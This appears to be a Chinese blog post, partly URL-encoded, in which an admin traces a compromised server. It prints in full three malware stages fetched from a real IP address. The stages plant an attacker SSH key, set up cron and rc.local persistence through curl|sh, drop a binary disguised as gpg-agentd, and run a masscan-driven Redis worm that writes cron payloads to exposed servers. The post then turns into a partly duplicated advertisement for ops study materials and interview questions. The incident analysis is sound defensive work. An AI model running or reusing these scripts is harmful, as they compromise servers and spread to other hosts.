看到了在半夜%2012%20点左右,在服务器上装了很多软件,其中有几个软件引起了我的注意,下面详细讲。
%20边找边猜,如果我们要做坏事,大概会在哪里做文章,自动启动?定时启动?对,计划任务:
%20crontab%20-e
%20果然,线索找到了。
%20**%2002%20作案动机%20**
%20上面的计划任务的意思就是每%2015%20分钟去服务器上下载一个脚本,并且执行这个脚本。
%20我们把脚本下载下来看一下:
%20curl%20-fsSL%20159.89.190.243/ash.php%20>%20ash.sh
%20脚本内容如下:
%20uname%20-a
%20id
%20hostname
%20setenforce%200%202>/dev/null
%20ulimit%20-n%2050000
%20ulimit%20-u%2050000
%20crontab%20-r%202>/dev/null
%20rm%20-rf%20/var/spool/cron/*%202>/dev/null
%20mkdir%20-p%20/var/spool/cron/crontabs%202>/dev/null
%20mkdir%20-p%20/root/.ssh%202>/dev/null
%20echo%20'ssh-rsa
%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx
%20redisX’%20>%20/root/.ssh/authorized_keys
%20echo%20‘*/15%20*%20*%20*%20*%20curl%20-fsSL%20159.89.190.243/ash.php|sh’%20>%20/var/spool/cron/root
%20echo%20‘*/20%20*%20*%20*%20*%20curl%20-fsSL%20159.89.190.243/ash.php|sh’%20>%20/var/spool/cron/crontabs/root
%20yum%20install%20-y%20bash%202>/dev/null
%20apt%20install%20-y%20bash%202>/dev/null
%20apt-get%20install%20-y%20bash%202>/dev/null
%20bash%20-c%20‘curl%20-fsSL%20159.89.190.243/bsh.php|bash’%202>/dev/null
%20**大致分析一下该脚本的主要用途:**首先是关闭%20SELinux,解除%20Shell%20资源访问限制,然后在%20/root/.ssh/authorized_keys%20文件中生成%20SSH%20公钥。
%20这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多。
%20接下来安装%20Bash,最后是继续下载第二个脚本%20bsh.php,并且执行。继续下载并分析%20bsh.pbp,内容如下:
%20sleep%20$(%20seq%203%207%20|%20sort%20-R%20|%20head%20-n1%20)
%20cd%20/tmp%20||%20cd%20/var/tmp
%20sleep%201
%20mkdir%20-p%20.ICE-unix/…%20&&%20chmod%20-R%20777%20.ICE-unix%20&&%20cd%20.ICE-unix/…
%20sleep%201
%20if%20[%20-f%20.watch%20];%20then
%20rm%20-rf%20.watch
%20exit%200
%20fi
%20sleep%201
%20echo%201%20>%20.watch
%20sleep%201
%20ps%20x%20|%20awk%20‘!/awk/%20&&%20/redisscan|ebscan|redis-cli/%20{print%20$1}’%20|%20xargs%20kill%20-9%202>/dev/null
%20ps%20x%20|%20awk%20‘!/awk/%20&&%20/barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/%20{print%20$1}’%20|%20xargs%20kill%20-9%202>/dev/null
%20sleep%201
%20if%20!%20[%20-x%20/usr/bin/gpg-agentd%20];%20then
%20curl%20-s%20-o%20/usr/bin/gpg-agentd%20159.89.190.243/dump.db
%20echo%20‘/usr/bin/gpg-agentd’%20>%20/etc/rc.local
%20echo%20‘curl%20-fsSL%20159.89.190.243/ash.php|sh’%20>>%20/etc/rc.local
%20echo%20‘exit%200’%20>>%20/etc/rc.local
%20fi
%20sleep%201
%20chmod%20+x%20/usr/bin/gpg-agentd%20&&%20/usr/bin/gpg-agentd%20||%20rm%20-rf%20/usr/bin/gpg-agentd
%20sleep%201
%20if%20!%20[%20-x%20“$(command%20-v%20masscan)”%20];%20then
%20rm%20-rf%20/var/lib/apt/lists/*
%20rm%20-rf%20x1.tar.gz
%20if%20[%20-x%20“$(command%20-v%20apt-get)”%20];%20then
%20export%20DEBIAN_FRONTEND=noninteractive
%20apt-get%20update%20-y
%20apt-get%20install%20-y%20debconf-doc
%20apt-get%20install%20-y%20build-essential
%20apt-get%20install%20-y%20libpcap0.8-dev%20libpcap0.8
%20apt-get%20install%20-y%20libpcap*
%20apt-get%20install%20-y%20make%20gcc%20git
%20apt-get%20install%20-y%20redis-server
%20apt-get%20install%20-y%20redis-tools
%20apt-get%20install%20-y%20redis
%20apt-get%20install%20-y%20iptables
%20apt-get%20install%20-y%20wget%20curl
%20fi
%20if%20[%20-x%20“$(command%20-v%20yum)”%20];%20then
%20yum%20update%20-y
%20yum%20install%20-y%20epel-release
%20yum%20update%20-y
%20yum%20install%20-y%20git%20iptables%20make%20gcc%20redis%20libpcap%20libpcap-devel
%20yum%20install%20-y%20wget%20curl
%20fi
%20sleep%201
%20curl%20-sL%20-o%20x1.tar.gz%20https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
%20sleep%201
%20[%20-f%20x1.tar.gz%20]%20&&%20tar%20zxf%20x1.tar.gz%20&&%20cd%20masscan-1.0.4%20&&%20make%20&&%20make%20install%20&&%20cd%20…%20&&%20rm%20-rf%20masscan-1.0.4
%20fi
%20sleep%203%20&&%20rm%20-rf%20.watch
%20bash%20-c%20‘curl%20-fsSL%20159.89.190.243/rsh.php|bash’%202>/dev/null
%20这段脚本的代码比较长,但主要的功能有%204%20个:
%20- %20
下载远程代码到本地,添加执行权限,chmod%20u+x。
%20 - %20
修改%20rc.local,让本地代码开机自动执行。
%20 - %20
下载%20Github%20上的开源扫描器代码,并安装相关的依赖软件,也就是我上面的%20Messages%20里看到的记录。
%20 - %20
下载第三个脚本,并且执行。
%20
我去%20Github%20上看了下这个开源代码,简直吊炸天:
%20Transmitting%2010%20Million%20Packets%20Per%20Second(每秒发送%201000%20万个数据包),比%20nmap%20速度还要快,这就不难理解为什么阿里云把服务器冻结了。
%20大概看了下%20Readme%20之后,我也没有细究,继续下载第三个脚本:
%20setenforce%200%202>/dev/null
%20ulimit%20-n%2050000
%20ulimit%20-u%2050000
%20sleep%201
%20iptables%20-I%20INPUT%201%20-p%20tcp%20--dport%206379%20-j%20DROP%202>/dev/null
%20iptables%20-I%20INPUT%201%20-p%20tcp%20--dport%206379%20-s%20127.0.0.1%20-j%20ACCEPT%202>/dev/null
%20sleep%201
%20rm%20-rf%20.dat%20.shard%20.ranges%20.lan%202>/dev/null
%20sleep%201
%20echo%20‘config%20set%20dbfilename%20“backup.db”’%20>%20.dat
%20echo%20‘save’%20>>%20.dat
%20echo%20‘flushall’%20>>%20.dat
%20echo%20‘set%20backup1%20“/n/n/n*/2%20*%20*%20*%20*%20curl%20-fsSL%20http://159.89.190.243/ash.php%20|%20sh/n/n”’%20>>%20.dat
%20echo%20‘set%20backup2%20“/n/n/n*/3%20*%20*%20*%20*%20wget%20-q%20-O-%20http://159.89.190.243/ash.php%20|%20sh/n/n”’%20>>%20.dat
%20echo%20‘set%20backup3%20“/n/n/n*/4%20*%20*%20*%20*%20curl%20-fsSL%20http://159.89.190.243/ash.php%20|%20sh/n/n”’%20>>%20.dat
%20echo%20‘set%20backup4%20“/n/n/n*/5%20*%20*%20*%20*%20wget%20-q%20-O-%20http://159.89.190.243/ash.php%20|%20sh/n/n”’%20>>%20.dat
%20echo%20‘config%20set%20dir%20“/var/spool/cron/”’%20>>%20.dat
%20echo%20‘config%20set%20dbfilename%20“root”’%20>>%20.dat
%20echo%20‘save’%20>>%20.dat
%20echo%20‘config%20set%20dir%20“/var/spool/cron/crontabs”’%20>>%20.dat
%20echo%20‘save’%20>>%20.dat
%20sleep%201
%20masscan%20--max-rate%2010000%20-p6379,6380%20--shard%20$(%20seq%201%2022000%20|%20sort%20-R%20|%20head%20-n1%20)/22000%20--exclude%20255.255.255.255%200.0.0.0/0%202>/dev/null%20|%20awk%20‘{print%20$6,%20substr($4,%201,%20length($4)-4)}’%20|%20sort%20|%20uniq%20>%20.shard
%20sleep%201
%20while%20read%20-r%20h%20p;%20do
%20cat%20.dat%20|%20redis-cli%20-h%20$h%20-p%20$p%20--raw%202>/dev/null%201>/dev/null%20&
%20done%20<%20.shard
%20sleep%201
%20自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
%20深知大多数Linux运维工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
%20因此收集整理了一份《2024年Linux运维全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip1024b (备注Linux运维获取)
为了做好运维面试路上的助攻手,特整理了上百道 【运维技术栈面试题集锦】 ,让你面试不慌心不跳,高薪offer怀里抱!
这次整理的面试题,小到shell、MySQL,大到K8s等云原生技术栈,不仅适合运维新人入行面试需要,还适用于想提升进阶跳槽加薪的运维朋友。
本份面试集锦涵盖了
- 174 道运维工程师面试题
- 128道k8s面试题
- 108道shell脚本面试题
- 200道Linux面试题
- 51道docker面试题
- 35道Jenkis面试题
- 78道MongoDB面试题
- 17道ansible面试题
- 60道dubbo面试题
- 53道kafka面试
- 18道mysql面试题
- 40道nginx面试题
- 77道redis面试题
- 28道zookeeper
总计 1000+ 道面试题, 内容 又全含金量又高
- 174道运维工程师面试题
1、什么是运维?
2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?
3、现在给你三百台服务器,你怎么对他们进行管理?
4、简述raid0 raid1raid5二种工作模式的工作原理及特点
5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?
6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
7、Tomcat和Resin有什么区别,工作中你怎么选择?
8、什么是中间件?什么是jdk?
9、讲述一下Tomcat8005、8009、8080三个端口的含义?
10、什么叫CDN?
11、什么叫网站灰度发布?
12、简述DNS进行域名解析的过程?
13、RabbitMQ是什么东西?
14、讲一下Keepalived的工作原理?
15、讲述一下LVS三种模式的工作过程?
16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?
17、如何重置mysql root密码?
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
择?
8、什么是中间件?什么是jdk?
9、讲述一下Tomcat8005、8009、8080三个端口的含义?
10、什么叫CDN?
11、什么叫网站灰度发布?
12、简述DNS进行域名解析的过程?
13、RabbitMQ是什么东西?
14、讲一下Keepalived的工作原理?
15、讲述一下LVS三种模式的工作过程?
16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?
17、如何重置mysql root密码?
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-a1vStEgD-1713091365216)]
